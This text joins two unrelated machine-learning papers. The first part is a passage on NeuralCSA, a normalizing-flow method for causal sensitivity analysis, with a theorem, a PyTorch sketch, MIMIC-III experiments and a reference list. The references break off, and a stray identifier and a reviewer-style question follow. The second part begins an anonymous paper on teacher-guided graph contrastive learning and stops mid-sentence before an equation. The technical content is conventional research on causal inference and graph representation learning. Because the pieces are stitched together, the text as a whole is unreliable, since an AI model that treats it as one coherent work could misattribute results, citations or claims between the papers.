The partial identification problem from Eq. (4) is still hard to solve as it involves two nested constrained optimization problems. However, we can further simplify Eq. (4): we will show in Sec. 5.2 that we can replace the right supremum with fixed distributions \( P^*(U \mid x, a) \) and \( P^*(Y \mid x, a, u) \) for all \( u \in \mathcal{U} \subseteq \mathbb{R}^{d_y} \) so that Eq. (2) holds. Then, Eq. (4) reduces to a single constrained optimization problem (left supremum). Moreover, we will show that we can choose \( P^*(Y \mid x, a, u) = \delta(Y - f^*_{x,a}(u)) \) as a delta-distribution induced by an invertible function \( f^*_{x,a} : \mathcal{U} \rightarrow \mathcal{Y} \). The constraint in Eq. (2), which ensures compatibility with the observational data, then reduces to \( P_{\text{obs}}(Y \mid x, a) = P^*(f^*_{x,a}(U) \mid x, a) \). This motivates the following two-stage procedure (see Fig. 3).

**Two-stage procedure:** In Stage 1, we fix \( P^*(U \mid x, a) \) and fix an invertible function \( f^*_{x,a} : \mathcal{U} \rightarrow \mathcal{Y} \) so that \( P_{\text{obs}}(Y \mid x, a) = P^*(f^*_{x,a}(U) \mid x, a) \) holds. That is, the induced push-forward distribution of \( P^*(U \mid x, a) \) under \( f^*_{x,a} \) must coincide with the observational distribution \( P_{\text{obs}}(Y \mid x, a) \). The existence of such a function is always guaranteed (Chen & Gopinath, 2000). In Stage 2, we then set \( P(U \mid x, a) = P^*(U \mid x, a) \) and \( P(Y \mid x, a, u) = P^*(Y \mid x, a, u) \) in Eq. (4) and only optimize over the left supremum. That is, we can write Stage 2 for discrete treatments as

\[ \sup_{P(u \mid x, A \neq a)} F \left( P(f^*_{x,a}(U) \mid x) \right), \quad (5) \]

where we maximize over the distribution \( P(u \mid x, A \neq a) \) for a fixed treatment intervention \( a \). For continuous treatments, we can directly take the supremum over \( P(u \mid x) \).

5.2 THEORETICAL GUARANTEES

We now provide a formal result showing that our two-stage procedure returns valid solutions to the partial identification problem from Eq. (4).
The following theorem states that Stage 2 of our procedure is able to attain the optimal upper bound \( Q^+_M(x, a) \) from Eq. (4), even after fixing the distributions \( P^*(U \mid x, a) \) and \( P^*(Y \mid x, a, u) \) as done in Stage 1. A proof is provided in Appendix B.

**Theorem 1 (Sufficiency of two-stage procedure).** Let \( M \) be a transformation-invariant GTSM. For fixed \( x \in \mathcal{X} \) and \( a \in \mathcal{A} \), let \( P^*(U \mid x, a) \) be a fixed distribution on \( \mathcal{U} = \mathbb{R}^{d_u} \) and \( f^*_{x,a} : \mathcal{U} \rightarrow \mathcal{Y} \) a fixed invertible function so that \( P_{\text{obs}}(Y \mid x, a) = P^*(f^*_{x,a}(U) \mid x, a) \). Let \( \mathcal{P}^* \) denote the space of all full probability distributions \( P \) that induce \( P^*(U \mid x, a) \) and \( P^*(Y \mid x, a, u) = \delta(Y - f^*_{x,a}(u)) \) and that satisfy \( P \in M \). Then, under Assumption 1, it holds that \( Q^+_M(x, a) = \sup_{P \in \mathcal{P}^*} Q(x, a, P) \) and \( Q^-_M(x, a) = \inf_{P \in \mathcal{P}^*} Q(x, a, P) \).

**Intuition:** Theorem 1 has two major implications: (i) it is sufficient to fix the distributions \( P^*(U \mid x, a) \) and \( P^*(Y \mid x, u, a) \), i.e., the components in the right supremum of Eq. (4), and only optimize over the left supremum; and (ii) it is sufficient to choose \( P^*(Y \mid x, u, a) = \delta(Y - f_{x,a}^*(u)) \) as a delta-distribution induced by an invertible function \( f_{x,a}^* : \mathcal{U} \to \mathcal{Y} \), which satisfies the data-compatibility constraint \( P_{\text{obs}}(Y \mid x, a) = P^*(f_{x,a}^*(U) \mid x, a) \).

**Intuition for (i):** In Eq. (4), we optimize jointly over all components of the full distribution. This suggests that there are multiple solutions that differ only in the unobserved components of \( P \) (i.e., in \( \mathcal{U} \)) but lead to the same potential outcome distribution and causal query. Theorem 1 states that we may restrict the space of possible solutions by fixing the components \( P^*(U \mid x, a) \) and \( P^*(Y \mid x, a, u) \), without losing the ability to attain the optimal upper bound \( Q_M^+(x, a) \) from Eq. (4).

**Intuition for (ii):** We cannot pick just any \( P^*(Y \mid x, a, u) \) that satisfies Eq. (2). For example, any distribution that induces \( Y \perp\!\!\!\perp U \mid X, A \) would satisfy Eq. (2), but it implies unconfoundedness and would thus not lead to a valid upper bound \( Q_M^+(x, a) \). Intuitively, we have to choose a \( P(Y \mid x, a, u) \) that induces "maximal dependence" (mutual information) between \( U \) and \( Y \) (conditioned on \( X \) and \( A \)), because the GTSM does not restrict this part of the full probability distribution \( P \). The maximal mutual information is achieved if we choose \( P(Y \mid x, a, u) = \delta(Y - f_{x,a}^*(u)) \).

5.3 NEURAL INSTANTIATION: NEURALCSA

We now provide a neural instantiation, called NeuralCSA, of the above two-stage procedure using conditional normalizing flows (CNFs) (Winkler et al., 2019). The architecture of NeuralCSA is shown in Fig. 4. NeuralCSA instantiates the two-stage procedure as follows:

**Stage 1:** We fix \( P^*(U \mid x, a) \) to the standard normal distribution on \( \mathcal{U} = \mathbb{R}^{d_u} \). Our task is then to learn an invertible function \( f_{x,a}^* : \mathcal{U} \to \mathcal{Y} \) that maps the standard Gaussian distribution on \( \mathcal{U} \) to \( P_{\text{obs}}(Y \mid x, a) \). We model \( f_{x,a}^* \) as a CNF \( f^*_{g^*_\theta(x,a)} \), where \( f^* \) is a normalizing flow (Rezende & Mohamed, 2015) whose parameters are the output of a fully connected neural network \( g^*_\theta \), which itself is parametrized by \( \theta \) (Winkler et al., 2019).
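For concreteness, here is a minimal sketch of such a hypernetwork-parametrized conditional flow, using a single affine layer as a stand-in for the autoregressive neural spline flows of the actual implementation; all module and variable names are illustrative:

```python
import torch
import torch.nn as nn

class ConditionalAffineFlow(nn.Module):
    """Minimal CNF: a hypernetwork g(x, a) outputs the shift/log-scale of an
    affine map f(u) = u * exp(log_scale) + shift applied to U ~ N(0, I)."""

    def __init__(self, d_cond: int, d_out: int, d_hidden: int = 64):
        super().__init__()
        self.hyper = nn.Sequential(
            nn.Linear(d_cond, d_hidden), nn.ReLU(),
            nn.Linear(d_hidden, 2 * d_out),
        )

    def forward(self, cond: torch.Tensor, u: torch.Tensor) -> torch.Tensor:
        shift, log_scale = self.hyper(cond).chunk(2, dim=-1)
        return u * log_scale.exp() + shift       # invertible in u for fixed (x, a)

    def log_prob(self, cond: torch.Tensor, y: torch.Tensor) -> torch.Tensor:
        shift, log_scale = self.hyper(cond).chunk(2, dim=-1)
        u = (y - shift) * (-log_scale).exp()     # inverse map
        base = torch.distributions.Normal(0.0, 1.0).log_prob(u).sum(-1)
        return base - log_scale.sum(-1)          # change-of-variables correction

# Stage 1 training step: maximize the log-likelihood of observed outcomes.
flow = ConditionalAffineFlow(d_cond=9, d_out=1)  # e.g., 8 covariates + 1 treatment
opt = torch.optim.Adam(flow.parameters(), lr=1e-3)
xa = torch.randn(32, 9); y = torch.randn(32, 1)  # toy batch of (x, a) and y
loss = -flow.log_prob(xa, y).mean()
opt.zero_grad(); loss.backward(); opt.step()

# Sampling from the learned P(Y | x, a): push base noise through the flow.
y_samples = flow(xa, torch.randn(32, 1))
```

Stacking several such conditional layers (or spline layers, as in the implementation) follows the same pattern; the likelihood maximized here corresponds to the Stage 1 loss defined next.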
We obtain \( \theta \) by maximizing the empirical Stage 1 loss \( L_1(\theta) = \sum_{i=1}^n \log P(f^*_{g^*_\theta(x_i, a_i)}(U) = y_i) \), where \( U \sim N(0_{d_u}, I_{d_u}) \) is standard normally distributed. The Stage 1 loss can be computed analytically via the change-of-variables formula (see Appendix F).

**Stage 2:** In Stage 2, we need to maximize over distributions on \( U \) in the latent space \( \mathcal{U} \) that maximize the causal query \( F(P(f^*_{g^*_{\theta_{\text{opt}}}(x,a)}(U) \mid x)) \), where \( \theta_{\text{opt}} \) is a solution from maximizing \( L_1(\theta) \) in Stage 1. We can do this by learning a second CNF \( \tilde{f}_{g_\eta(x,a)} \), where \( \tilde{f} : \tilde{\mathcal{U}} \to \mathcal{U} \) is a normalizing flow that maps a standard normally distributed auxiliary variable \( \tilde{U} \sim N(0_{d_u}, I_{d_u}) \) to the latent space \( \mathcal{U} \), and whose parameters are the output of a fully connected neural network \( g_\eta \) parametrized by \( \eta \). The CNF \( \tilde{f}_{g_\eta(x,a)} \) from Stage 2 induces a new distribution on \( \mathcal{U} \), which mimics the shift due to unobserved confounding when intervening instead of conditioning (i.e., going from Eq. (2) to Eq. (3)). We can compute the query under the shifted distribution by concatenating the Stage 2 CNF with the Stage 1 CNF and applying \( F \) to the shifted outcome distribution (see Fig. 4). More precisely, we optimize \( \eta \) by maximizing or minimizing the empirical Stage 2 loss

\[ L_2(\eta) = \sum_{i=1}^n F \left( P \left( f^*_{g^*_{\theta_{\text{opt}}}(x_i, a_i)} \left( (1 - \xi_i) \, \tilde{f}_{g_\eta(x_i, a_i)}(\tilde{U}) + \xi_i \, \tilde{U} \right) \right) \right), \quad (6) \]

where \( \xi_i = P_{\text{obs}}(a_i \mid x_i) \) if \( A \) is discrete, and \( \xi_i = 0 \) if \( A \) is continuous.

**Learning algorithm for Stage 2:** There are two remaining challenges we need to address in Stage 2: (i) optimizing Eq. (6) does not ensure that the sensitivity constraints imposed by the GTSM \( M \) hold; and (ii) computing the Stage 2 loss from Eq. (6) may not be analytically tractable. For (i), we propose to incorporate the sensitivity constraints by using the augmented Lagrangian method (Nocedal & Wright, 2006), which has already been successfully applied in the context of partial identification with neural networks (Padh et al., 2023; Schröder et al., 2024). For (ii), we propose to obtain samples \( \tilde{u} = (\tilde{u}^{(j)})_{j=1}^k \overset{\text{i.i.d.}}{\sim} N(0_{d_u}, I_{d_u}) \) and \( \xi = (\xi^{(j)})_{j=1}^k \overset{\text{i.i.d.}}{\sim} \text{Bernoulli}(P_{\text{obs}}(a \mid x)) \), together with Monte Carlo estimators \( \hat{L}_2(\eta, \tilde{u}, \xi) \) of the Stage 2 loss \( L_2(\eta) \) and \( \hat{D}_{x,a}(\eta, \tilde{u}) \) of the sensitivity constraint \( D_{x,a}(P(U \mid x), P(U \mid x, a)) \). We refer to Appendix E for details, including instantiations of our framework for numerous sensitivity models and causal queries.

**Implementation:** We use autoregressive neural spline flows (Durkan et al., 2019; Dolatabadi et al., 2020). For estimating propensity scores \( P_{\text{obs}}(a \mid x) \), we use fully connected neural networks with softmax activation. We perform training using the Adam optimizer (Kingma & Ba, 2015). We choose the number of epochs such that NeuralCSA satisfies the sensitivity constraint for a given sensitivity parameter. Details are in Appendix F.

6 EXPERIMENTS

We now demonstrate the effectiveness of NeuralCSA for causal sensitivity analysis empirically.
As is common in the causal inference literature, we use synthetic and semi-synthetic data with known causal ground truth to evaluate NeuralCSA (Kallus et al., 2019; Jesson et al., 2022). We proceed as follows: (i) we use synthetic data to show the validity of bounds from NeuralCSA under multiple sensitivity models, treatment types, and causal queries, and we also show that, for the MSM, the NeuralCSA bounds coincide with known optimal solutions; (ii) we show the validity of the NeuralCSA bounds using a semi-synthetic dataset; (iii) we show the applicability of NeuralCSA in a case study using a real-world dataset with multiple outcomes, which cannot be handled by previous approaches. We refer to Appendix D for details regarding datasets and experimental evaluation, and to Appendix H for additional experiments.

Figure 5: Validating the correctness of NeuralCSA (ours) by comparing with optimal closed-form solutions (CF) for the MSM on simulated data. Left: Dataset 1, binary treatment. Right: Dataset 2, continuous treatment. Reported: mean ± standard deviation over 5 runs.

Figure 6: Confirming the validity of our NeuralCSA bounds for various sensitivity models. Left: Dataset 1, binary treatment. Right: Dataset 2, continuous treatment. Reported: mean ± standard deviation over 5 runs.

(i) Synthetic data: We consider two synthetic datasets of sample size \( n = 10000 \) inspired by previous work on sensitivity analysis. Dataset 1 is adapted from Kallus et al. (2019) and has a binary treatment \( A \in \{0, 1\} \). The data-generating process follows an MSM with oracle sensitivity parameter \( \Gamma^* = 2 \). We are interested in the CATE \( \tau(x) = \mathbb{E}[Y(1) - Y(0) \mid x] \). Dataset 2 is adapted from Jesson et al. (2022) and has a continuous treatment \( A \in [0, 1] \). Here, we are interested in the dose-response function \( \mu(x, a) = \mathbb{E}[Y(a) \mid x] \), where we choose \( a = 0.5 \). We report results for further treatment values in Appendix H.

We first compare our NeuralCSA bounds with existing closed-form bounds (CF) for the MSM (Dorn & Guo, 2022; Frauen et al., 2023b), which have been proven to be optimal. We plot both NeuralCSA and the CF bounds for both datasets and three choices of the sensitivity parameter \( \Gamma \in \{2, 4, 10\} \) (Fig. 5). Our bounds almost coincide with the optimal CF solutions, which confirms that NeuralCSA learns optimal bounds under the MSM.

We also show the validity of our NeuralCSA bounds for Rosenbaum's sensitivity model and the following \( f \)-sensitivity models: Kullback-Leibler (KL, \( f(x) = x \log(x) \)), Total Variation (TV, \( f(x) = 0.5|x - 1| \)), Hellinger (HE, \( f(x) = (\sqrt{x} - 1)^2 \)), and Chi-squared (\( \chi^2 \), \( f(x) = (x - 1)^2 \)). To do so, we choose the ground-truth sensitivity parameter \( \Gamma^* \) for each sensitivity model that satisfies the respective sensitivity constraint (see Appendix G for details). The results are in Fig. 6. We make the following observations: (i) all bounds cover the causal query on both datasets, thus confirming the validity of NeuralCSA; and (ii) for Dataset 1, the MSM returns the tightest bounds because our simulation follows an MSM.

(ii) Semi-synthetic data: We create a semi-synthetic dataset using MIMIC-III (Johnson et al., 2016), which includes electronic health records from patients admitted to intensive care units. We extract 8 confounders and a binary treatment (mechanical ventilation). Then, we augment the data with a synthetic unobserved confounder and outcome.
We obtain \( n = 14719 \) patients and split the data into train (80%), validation (10%), and test (10%) sets. For details, see Appendix G.

We verify the validity of our NeuralCSA bounds for CATE in the following way: for each sensitivity model, we obtain the smallest oracle sensitivity parameter \( \Gamma^* \) that guarantees coverage (i.e., satisfies the respective sensitivity constraint) for 50% of the test samples. Then, we plot the coverage and median interval length of the NeuralCSA bounds over the test set. The results are in Table 2. We observe that (i) all bounds achieve at least 50% coverage, thus confirming the validity of the bounds, and (ii) some sensitivity models (e.g., the MSM) are conservative, i.e., they achieve much higher coverage and interval length than needed. This is because the sensitivity constraints of these models do not adapt well to the data-generating process, hence the need to choose a large \( \Gamma^* \) to guarantee coverage. This highlights the importance of choosing a sensitivity model that captures the data-generating process well. For further details, we refer to Jin et al. (2022).

We also provide further insights into the difference between two exemplary sensitivity models: the MSM and the KL-sensitivity model. To do so, we plot the observational distribution from Stage 1 together with the shifted distributions from Stage 2 that lead to the respective upper bound for a fixed test patient (Fig. 7). The distribution shift corresponding to the MSM is a step function, which is consistent with results from established literature (Jin et al., 2023). This is in contrast to the smooth distribution shift obtained by the KL-sensitivity model. In addition, this example illustrates the possibility of using NeuralCSA for sensitivity analysis on the entire interventional density.

(iii) Case study using real-world data: We now demonstrate an application of NeuralCSA to perform causal sensitivity analysis for an interventional distribution on multiple outcomes. To do so, we use the same MIMIC-III data from our semi-synthetic experiments but add two outcomes: heart rate (\( Y_1 \)) and blood pressure (\( Y_2 \)). We consider the causal query \( P(Y_1(1) \geq 115, Y_2(1) \geq 90 \mid X = x) \), i.e., the joint probability of achieving a heart rate higher than 115 and a blood pressure higher than 90 under treatment intervention ("danger area"). We consider an MSM and train NeuralCSA with sensitivity parameters \( \Gamma \in \{2, 4\} \). Then, we plot the Stage 1 distribution together with both Stage 2 distributions for a fixed, untreated patient from the test set in Fig. 8. As expected, increasing \( \Gamma \) leads to a distribution shift in the direction of the "danger area", i.e., high heart rate and high blood pressure. For \( \Gamma = 2 \), there is only a moderate fraction of probability mass inside the danger area, while, for \( \Gamma = 4 \), this fraction is much larger. A practitioner may potentially decide against treatment if there are other unknown factors (e.g., an undetected comorbidity) that could result in a confounding strength of \( \Gamma = 4 \).

Conclusion. From a methodological perspective, NeuralCSA offers new ideas for causal sensitivity analysis and partial identification: in contrast to previous methods, NeuralCSA explicitly learns a latent distribution shift due to treatment intervention. We refer to Appendix I for a discussion on limitations and future work.
From an applied perspective, NeuralCSA enables practitioners to perform causal sensitivity analysis in numerous settings, including multiple outcomes. Furthermore, it allows for choosing from a wide variety of sensitivity models, which may be crucial to effectively incorporate domain knowledge about the data-generating process.

Table 2: Results for semi-synthetic data. Reported: mean ± standard deviation (5 runs).

| Sensitivity model | Coverage | Interval length |
|------------------|----------|----------------|
| MSM (\( \Gamma^* = 5.48 \)) | 0.91 ± 0.03 | 0.77 ± 0.03 |
| KL (\( \Gamma^* = 0.25 \)) | 0.54 ± 0.07 | 0.31 ± 0.01 |
| TV (\( \Gamma^* = 0.38 \)) | 0.86 ± 0.09 | 0.83 ± 0.14 |
| HE (\( \Gamma^* = 0.18 \)) | 0.83 ± 0.06 | 0.63 ± 0.03 |
| \( \chi^2 \) (\( \Gamma^* = 0.68 \)) | 0.67 ± 0.07 | 0.41 ± 0.01 |
| RB (\( \Gamma^* = 14.42 \)) | 0.79 ± 0.07 | 0.56 ± 0.03 |

Acknowledgements. S.F. acknowledges funding via Swiss National Science Foundation Grant 186932.

REFERENCES

Matteo Bonvini, Edward Kennedy, Valerie Ventura, and Larry Wasserman. Sensitivity analysis for marginal structural models. *arXiv preprint*, arXiv:2210.04681, 2022.

Scott Shaobing Chen and Ramesh A. Gopinath. Gaussianization. In *NeurIPS*, 2000.

Victor Chernozhukov, Ivan Fernández-Val, and Blaise Melly. Inference on counterfactual distributions. *Econometrica*, 81(6):2205–2268, 2013.

Victor Chernozhukov, Denis Chetverikov, Mert Demirer, Esther Duflo, Christian Hansen, Whitney Newey, and James M. Robins. Double/debiased machine learning for treatment and structural parameters. *The Econometrics Journal*, 21(1):C1–C68, 2018. ISSN 1368-4221.

James Cornfield, William Haenszel, E. Cuyler Hammond, Abraham M. Lilienfeld, Michael B. Shimkin, and Ernst L. Wynder. Smoking and lung cancer: Recent evidence and a discussion of some questions. *Journal of the National Cancer Institute*, 22(1):173–203, 1959.

Alicia Curth and Mihaela van der Schaar. Nonparametric estimation of heterogeneous treatment effects: From theory to learning algorithms. In *AISTATS*, 2021.

Hadi M. Dolatabadi, Sarah Erfani, and Christopher Leckie. Invertible generative modeling using linear rational splines. In *AISTATS*, 2020.

Jacob Dorn and Kevin Guo. Sharp sensitivity analysis for inverse propensity weighting via quantile balancing. *Journal of the American Statistical Association*, 2022.

Jacob Dorn, Kevin Guo, and Nathan Kallus. Doubly-valid/doubly-sharp sensitivity analysis for causal inference with unmeasured confounding. *arXiv preprint*, arXiv:2112.11449, 2022.

Guilherme Duarte, Noam Finkelstein, Dean Knox, Jonathan Mummolo, and Ilya Shpitser. An automated approach to causal inference in discrete settings. *Journal of the American Statistical Association*, 2023.

Conor Durkan, Artur Bekasov, Iain Murray, and George Papamakarios. Neural spline flows. In *NeurIPS*, 2019.

A. Mesut Erzurumluoglu et al. Meta-analysis of up to 622,409 individuals identifies 40 novel smoking behaviour associated genetic loci. *Molecular Psychiatry*, 25(10):2392–2409, 2020.

Stefan Feuerriegel, Dennis Frauen, Valentyn Melnychuk, Jonas Schweisthal, Konstantin Hess, Alicia Curth, Stefan Bauer, Niki Kilbertus, Isaac S. Kohane, and Mihaela van der Schaar. Causal machine learning for predicting treatment outcomes. *Nature Medicine*, 2024.

Dennis Frauen, Tobias Hatt, Valentyn Melnychuk, and Stefan Feuerriegel. Estimating average causal effects from patient trajectories. In *AAAI*, 2023a.

Dennis Frauen, Valentyn Melnychuk, and Stefan Feuerriegel.
Sharp bounds for generalized causal sensitivity analysis. In *NeurIPS*, 2023b.

Florian Gunsilius. A path-sampling method to partially identify causal effects in instrumental variable models. *arXiv preprint*, arXiv:1910.09502, 2020.

Tobias Hatt, Daniel Tschernutter, and Stefan Feuerriegel. Generalizing off-policy learning under sample selection bias. In *UAI*, 2022.

Siyu Heng and Dylan S. Small. Sharpening the Rosenbaum sensitivity bounds to address concerns about interactions between observed and unobserved covariates. *Statistica Sinica*, 31(Online special issue):2331–2353, 2021.
6LyO8WTVTU
Intuitively, if you have a perfect teacher model, you can use it directly to calculate graph embeddings. Is it necessary to design such complicated contrastive learning losses to distill from the teacher model?
A Teacher-Guided Framework for Graph Representation Learning

Anonymous authors
Paper under double-blind review

Abstract

We consider the problem of unsupervised representation learning for Graph Neural Networks (GNNs). Several state-of-the-art approaches to this problem are based on Contrastive Learning (CL) principles that generate transferable representations. Their objective function can be posed as a supervised discriminative task using 'hard labels,' as they consider each pair of graphs as either 'equally positive' or 'equally negative.' However, it has been observed that using 'soft labels' in a Bayesian way can reduce the variance of the risk for discriminative tasks in supervised settings. Motivated by this, we propose a CL framework for GNNs, called Teacher-guided Graph Contrastive Learning (TGCL), that incorporates 'soft labels' to facilitate a more regularized discrimination. In particular, we propose a teacher-student framework where the student network learns the representation by distilling the representations produced by the teacher network trained using unlabelled graphs. Our proposed approach can be adapted to any existing CL method and empirically improves the performance across diverse downstream tasks.

1 Introduction

Graphs are versatile data structures representing relationships between entities in various real-world applications, e.g., social networks (Ohtsuki et al., 2006; Fan et al., 2019), bio-informatics (Muzio et al., 2021), and knowledge graphs (Wang et al., 2014; Baek et al., 2020). Acquiring labeled information for these applications can be a costly and time-consuming process. Towards this, self-supervised learning (SSL) has emerged as an important research area that leverages the inherent structure or content of the data to learn informative representations without relying on explicit labels (Hu et al., 2020; Hwang et al., 2020; Grover & Leskovec, 2016).

Existing SSL methods for graphs can be broadly categorized as (a) local similarity-based predictive learning and (b) global similarity-based contrastive learning. Predictive learning-based methods (Hu et al., 2020; Kim & Oh, 2021; Rong et al., 2020) produce artificial labels by capturing specific local contextual information of neighborhood sub-graphical features to produce the representations. However, this restricts them to capturing only local graph semantics. Alternatively, contrastive learning (CL)-based models for graphs aim to maximize the agreement between instances perturbed by semantic-invariant augmentations (positive views) while repelling the others (negative views) to capture global semantics. CL-based SSL models are extremely popular in the computer-vision community, as one can easily generate such semantic-invariant perturbations using simple techniques, e.g., rotation, flipping, and color jittering (Chen et al., 2020a; Grill et al., 2020). Several graph contrastive learning methods have also been proposed where the positive pairs are produced using transformations, e.g., edge perturbation, attribute masking, and subgraph sampling. However, unlike continuous domains (e.g., images), even "minor" modifications in the graph structures, such as removing one edge or node, can significantly change the properties of graphs due to their discrete nature (see Figures 1a and 1b). Recently, discrepancy-based self-supervised learning (D-SLA) (Kim et al., 2022) introduces edit-distance-based discrepancy measures to address these issues.
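As a concrete illustration of this brittleness, the following sketch (our toy example using networkx, not from the paper) shows that a single-edit perturbation can disconnect a graph entirely:

```python
import networkx as nx

# Two triangles joined by a single bridge edge (2, 3).
g0 = nx.Graph([(0, 1), (1, 2), (2, 0), (3, 4), (4, 5), (5, 3), (2, 3)])
g1 = g0.copy()
g1.remove_edge(2, 3)  # a "minor" one-edge perturbation...

# ...that nevertheless splits the graph into two components:
print(nx.is_connected(g0), nx.is_connected(g1))   # True False
# Yet the (exponential-time) exact edit distance between them is just 1:
print(nx.graph_edit_distance(g0, g1))             # 1.0
```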
However, computing the edit distance between two arbitrary graphs is NP-hard (Sanfeliu & Fu, 1983; Zeng et al., 2009). Further, it can only provide high-level structural information without capturing any semantic differences (Figure 1a and Figure 1b). Towards this, we aim to develop a graph representation learning framework that incorporates more semantically rich discriminative features to regularize the learning.

Figure 1: Illustrating the shortcomings of existing CL methods: (a) Even a "minor change" of removing one edge significantly alters the graph, splitting it into two disconnected components, which cannot be captured even using edit-distance-based discrepancy (Kim et al., 2022). (b & c) Next, we see a more specific example of correlated-structure molecules that are either active or inactive as binders in a set of human β-secretase inhibitors (Wu et al., 2018). (b) Molecules having dissimilar properties can have smaller edit distances, while (c) molecules from the same class can have larger edit distances. In other words, edit distance remains ineffective in capturing chemical semantics. To this end, we propose a distilled distance from a pre-trained teacher network that incorporates a "soft" perception of semantic distances for arbitrary graphs, producing better representations for a student network.

1.1 Motivation & Contributions

The existing CL methods can be viewed under one umbrella, since all of these techniques aim to learn representations by contrasting different views of the input graphs. In principle, these loss functions can be considered classification objectives created by assigning pseudo-labels to different views of input graphs (Oord et al., 2018; Gutmann & Hyvärinen, 2010). On the other hand, in the supervised learning literature, it has been observed that incorporating 'soft labels' in the form of knowledge distillation (KD) leads to better generalization (Menon et al., 2021; Hinton et al., 2015). Given these prior results, we ask the following question in this work: can introducing 'soft labels' into CL methods produce better graph representations?

The fundamental idea of KD is to use softened labels via a teacher network while minimizing the supervised risk of a student network by reducing the divergence between their logits (Hinton et al., 2015). Prior works have shown that the Bayes-distilled risk has lower variance compared to its naive undistilled counterpart, which leads to better generalization (Menon et al., 2021). Motivated by these results, we propose a novel Teacher-guided Graph Contrastive Learning (TGCL) framework. We design a distilled perception distance (or distilled distance) between two arbitrary input graphs using their deep features obtained from a pre-trained "teacher" to define a softer notion of positive/negative pairs. We train the student network by incorporating such 'soft labels' for each pair of graphs. We argue that, by introducing the distilled distance, we can capture regularized semantic differences between two arbitrary graphs, addressing the shortcomings of the existing CL frameworks for graphs. For example, Figure 1c demonstrates that our distilled distance obtained from the "teacher" can differ significantly among molecular graphs with correlated structures, capturing the chemical semantic differences between graphs. Figure 1b shows that the distilled distance captures the chemical semantic difference of molecules that have different chemical properties despite only a minor structural difference.

The contributions of this work are summarized below:
1. We propose a novel Teacher-guided Graph Contrastive Learning (TGCL) framework that incorporates the concept of knowledge distillation to learn graph representations.
2. The concept of "soft-labeled" pairs of graphs can be applied to any contrastive learning framework. We propose a distilled perception distance and present two TGCL frameworks by modifying the well-known NT-Xent loss and the D-SLA method to incorporate smooth perception from a teacher network for training the student network.
3. We conduct extensive experiments on graph classification for molecular datasets and link prediction on social network datasets, where our proposed framework consistently outperforms the existing methods.

2 Related Work

2.1 Representation Learning on Graphs

Classical Approaches: A straightforward graph representation approach considers a 'bag of nodes', which falls short in capturing the overall graph semantics (Hamilton, 2020). The Weisfeiler-Lehman kernel (Shervashidze et al., 2011) improves upon this by utilizing an iterative neighborhood aggregation strategy. One may also count the occurrences of small subgraph structures, called graphlets. However, this is a combinatorially challenging problem, and approximate algorithms are required (Ahmed et al., 2015; Hočevar & Demšar, 2014). A few other approaches enumerate different kinds of paths in graphs (Kashima et al., 2003; Borgwardt & Kriegel, 2005).

Shallow Algorithms: DeepWalk (Perozzi et al., 2014) and LINE (Tang et al., 2015) are random walk-based approaches using depth-first search (DFS) and breadth-first search (BFS) algorithms, respectively. node2vec (Grover & Leskovec, 2016) combines both BFS and DFS to learn node embeddings that maximize the likelihood of preserving node neighborhoods.

Predictive Self-supervised Graph Representation Learning: Here, the model aims to predict specific properties or relationships of graphs, such as predicting the attributes of masked nodes/edges (Hu et al., 2020), predicting the presence of an edge (Hwang et al., 2020), or predicting contextual properties and the presence of motifs (Hu et al., 2020; Rong et al., 2020). These predictive tasks serve as self-supervised learning objectives, as they do not require explicit supervised labels. Instead, they rely on the local sub-structure of the graph for producing labels.

Contrastive Self-supervised Graph Representation Learning: Deep Graph Infomax (DGI) (Veličković et al., 2019) maximizes the mutual information between the graph representation and patch representations. InfoGraph (Sun et al., 2020) maximizes the mutual information between the graph-level representation and the representations of substructures at different scales, such as nodes, edges, and triangles. Several other works (You et al., 2020; 2021; Zhu et al., 2021; Yin et al., 2022; Wang et al., 2022) generate a perturbed view of the original graph through attribute masking, edge perturbation, and subgraph sampling and employ a contrastive learning framework for better representation learning. Recent works (Suresh et al., 2021; Yang et al., 2021) also explore adversarial augmentation strategies to further improve the representations of contrastive frameworks.

2.2 Knowledge Distillation (KD)

KD (Hinton et al., 2015) is a popular technique for transferring knowledge from a large, complex model (a.k.a. the teacher) to a smaller, efficient model (a.k.a. the student) such that the student performs similarly to the teacher.
Several ongoing works also focus on improving the student's performance on a wide range of applications (Heo et al., 2019; Furlanello et al., 2018; Lopes et al., 2017; Li et al., 2021; Lee et al., 2018; Bhat et al., 2021). KD allows the student to learn from both the raw data and the distilled knowledge of the teacher, improving its generalization performance (Menon et al., 2021). A comprehensive review of KD can be found in (Wang & Yoon, 2021).

Self-supervised learning with KD has previously been explored in computer vision, typically to improve the performance of smaller models (Abbasi Koohpayegani et al., 2020; Chen et al., 2020b). Many of these approaches combined KD with CL methods (Fang et al., 2021; Gao et al., 2022). SimCLR-v2 (Chen et al., 2020b) applied a larger teacher model, first trained using a contrastive loss followed by supervised fine-tuning, to distill a smaller model via self-supervised learning. Xu et al. (2020) incorporate an auxiliary contrastive loss to obtain richer knowledge from the teacher network. Other approaches are proposed to transfer the final embeddings of a self-supervised pre-trained teacher (Navaneet et al., 2022; Song et al., 2023).

Limitations & Challenges: (1) Most of these methods use supervised labels to fine-tune the teacher network, restricting their applicability. (2) Further, these methods may not be applicable to graph inputs due to their discrete structure, where even minor perturbations can significantly change their semantics. Towards this, our proposed TGCL first obtains the teacher's distilled perception to calculate the semantic difference for arbitrary pairs of graphs, and then formulates soft self-supervised losses to train the student.

Figure 2: Comparing our proposed teacher-guided contrastive learning (TGCL) framework with existing contrastive learning methods (You et al., 2020; Xu et al., 2021) and D-SLA (Kim et al., 2022). From the classification point of view, the standard CL methods consider the similarity between the anchor and the perturbed graphs as "hard" positive pairs and the other graphs as "hard" negative pairs. D-SLA introduces "hard" discrepancies using the edit distance between the anchor and the perturbed graphs, while the other graphs act as "hard" negative pairs. Our proposed TGCL introduces a novel distilled perception distance for smooth discrimination between arbitrary graphs.

3 Proposed Method

3.1 Preliminaries

Graph Neural Network (GNN). Let \( G = (V, E, X_V, X_E) \) be an undirected graph in the space of graphs \( \mathcal{G} \), where \( V, E, X_V, X_E \) denote the set of nodes, edges, node attributes, and edge attributes, respectively. A GNN encodes a graph \( G \in \mathcal{G} \) to a \( d \)-dimensional embedding vector: \( f : \mathcal{G} \rightarrow \mathbb{R}^d \). \( f \) is often composed by stacking multiple message-passing layers. Let \( h_v^{(l)} \) denote the representation of a node \( v \in V \) with neighborhood \( N_v \) in the \( l \)-th layer, and let \( h_{vu}^{(l-1)} \) represent the attributes of edge \( (v, u) \in E \) in the \( (l-1) \)-th layer. Then, \( h_v^{(l)} \) can be expressed as follows:

